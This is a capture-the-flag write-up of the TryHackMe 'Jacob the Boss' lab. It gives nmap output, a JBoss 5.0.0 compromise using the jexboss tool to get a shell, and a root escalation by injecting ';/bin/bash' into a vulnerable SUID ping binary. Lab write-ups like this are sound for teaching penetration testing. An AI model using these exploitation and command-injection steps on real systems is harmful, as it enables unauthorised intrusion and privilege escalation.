# THM - Jacob the Boss

## Nmap

```bash
# Nmap 7.93 scan initiated Fri Oct 27 00:54:08 2023 as: nmap -sC -sV -oN nmap.initial jacobtheboss.box
Nmap scan report for jacobtheboss.box (10.10.209.115)
Host is up (0.060s latency).
Not shown: 987 closed tcp ports (conn-refused)
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey: 
|   2048 82ca136ed963c05f4a23a5a5a5103c7f (RSA)
|   256 a46ed25d0d362e732f1d529ce58a7b04 (ECDSA)
|_  256 6f54a65eba5badcc87eed3a8d5e0aa2a (ED25519)
80/tcp   open  http        Apache httpd 2.4.6 ((CentOS) PHP/7.3.20)
|_http-server-header: Apache/2.4.6 (CentOS) PHP/7.3.20
|_http-title: My first blog
111/tcp  open  rpcbind     2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|_  100000  3,4          111/udp6  rpcbind
1090/tcp open  java-rmi    Java RMI
|_rmi-dumpregistry: ERROR: Script execution failed (use -d to debug)
1098/tcp open  java-rmi    Java RMI
1099/tcp open  java-object Java Object Serialization
| fingerprint-strings: 
|   NULL: 
|     java.rmi.MarshalledObject|
|     hash[
|     locBytest
|     objBytesq
|     http://jacobtheboss.box:8083/q
|     org.jnp.server.NamingServer_Stub
|     java.rmi.server.RemoteStub
|     java.rmi.server.RemoteObject
|     xpw;
|     UnicastRef2
|_    jacobtheboss.box
3306/tcp open  mysql       MariaDB (unauthorized)
4444/tcp open  java-rmi    Java RMI
4445/tcp open  java-object Java Object Serialization
4446/tcp open  java-object Java Object Serialization
8009/tcp open  ajp13       Apache Jserv (Protocol v1.3)
| ajp-methods: 
|   Supported methods: GET HEAD POST PUT DELETE TRACE OPTIONS
|   Potentially risky methods: PUT DELETE TRACE
|_  See https://nmap.org/nsedoc/scripts/ajp-methods.html
8080/tcp open  http        Apache Tomcat/Coyote JSP engine 1.1
|_http-title: Welcome to JBoss&trade;
| http-methods: 
|_  Potentially risky methods: PUT DELETE TRACE
|_http-server-header: Apache-Coyote/1.1
8083/tcp open  http        JBoss service httpd
|_http-title: Site doesn't have a title (text/html).
3 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port1099-TCP:V=7.93%I=7%D=10/27%Time=653B4277%P=x86_64-pc-linux-gnu%r(N
SF:ULL,16F,"\xac\xed\0\x05sr\0\x19java\.rmi\.MarshalledObject\|\xbd\x1e\x9
SF:7\xedc\xfc>\x02\0\x03I\0\x04hash\[\0\x08locBytest\0\x02\[B\[\0\x08objBy
SF:tesq\0~\0\x01xp\|\x8f\xdevur\0\x02\[B\xac\xf3\x17\xf8\x06\x08T\xe0\x02\
SF:0\0xp\0\0\0\.\xac\xed\0\x05t\0\x1dhttp://jacobtheboss\.box:8083/q\0~\0\
SF:0q\0~\0\0uq\0~\0\x03\0\0\0\xc7\xac\xed\0\x05sr\0\x20org\.jnp\.server\.N
SF:amingServer_Stub\0\0\0\0\0\0\0\x02\x02\0\0xr\0\x1ajava\.rmi\.server\.Re
SF:moteStub\xe9\xfe\xdc\xc9\x8b\xe1e\x1a\x02\0\0xr\0\x1cjava\.rmi\.server\
SF:.RemoteObject\xd3a\xb4\x91\x0ca3\x1e\x03\0\0xpw;\0\x0bUnicastRef2\0\0\x
SF:10jacobtheboss\.box\0\0\x04J\0\0\0\0\0\0\0\0\xe2\+\xca,\0\0\x01\x8boy\x
SF:f7c\x80\0\0x");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port4445-TCP:V=7.93%I=7%D=10/27%Time=653B427D%P=x86_64-pc-linux-gnu%r(N
SF:ULL,4,"\xac\xed\0\x05");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port4446-TCP:V=7.93%I=7%D=10/27%Time=653B427D%P=x86_64-pc-linux-gnu%r(N
SF:ULL,4,"\xac\xed\0\x05");

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Oct 27 00:54:38 2023 -- 1 IP address (1 host up) scanned in 30.92 seconds

```

## Exploiting Jboss

As i saw in the result nmap scan. I checked the following page : **http://jacobtheboss.box:8080/**. Then the *web-console* seems to be interessting so i go to *http://jacobtheboss.box:8080/web-console/* and i saw a version number : Version: 5.0.0.GA (build: SVNTag=JBoss_5_0_0_GA date=200812041721)

I searched for "jboss 5.0.0 exploit" on goole and found this repo : https://github.com/joaomatosf/jexboss

Okayyyy, let's test this ! 

```
python3 jexboss.py -u jacobtheboss.box:8080
```

Annnd go a shell :

```
Shell> id
 Failed to check for updates
uid=1001(jacob) gid=1001(jacob) groups=1001(jacob) context=system_u:system_r:initrc_t:s0
```

## Running linpeas

Linpeas's loot : 

* -rwsr-xr-x. 1 root root 8.4K Jul 30  2020 /usr/bin/pingsys (Unknown SUID binary!)

Let's check this

## Exploit binary /usr/bin/pingsys

This is a replicat of the ping binary 

```
[jacob@jacobtheboss ~]$ /usr/bin/pingsys localhost
/usr/bin/pingsys localhost
PING localhost (127.0.0.1) 56(84) bytes of data.
64 bytes from localhost (127.0.0.1): icmp_seq=1 ttl=64 time=0.018 ms
64 bytes from localhost (127.0.0.1): icmp_seq=2 ttl=64 time=0.030 ms
64 bytes from localhost (127.0.0.1): icmp_seq=3 ttl=64 time=0.031 ms
64 bytes from localhost (127.0.0.1): icmp_seq=4 ttl=64 time=0.030 ms

--- localhost ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 2999ms
rtt min/avg/max/mdev = 0.018/0.027/0.031/0.006 ms
```

Okay, so let's do a command injection :

```
/usr/bin/pingsys 'localhost;/bin/bash'
PING localhost (127.0.0.1) 56(84) bytes of data.
64 bytes from localhost (127.0.0.1): icmp_seq=1 ttl=64 time=0.016 ms
64 bytes from localhost (127.0.0.1): icmp_seq=2 ttl=64 time=0.032 ms
64 bytes from localhost (127.0.0.1): icmp_seq=3 ttl=64 time=0.033 ms
64 bytes from localhost (127.0.0.1): icmp_seq=4 ttl=64 time=0.030 ms

--- localhost ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 2999ms
rtt min/avg/max/mdev = 0.016/0.027/0.033/0.009 ms



id
uid=0(root) gid=1001(jacob) groups=1001(jacob)
```

and we'rrr roooot :D
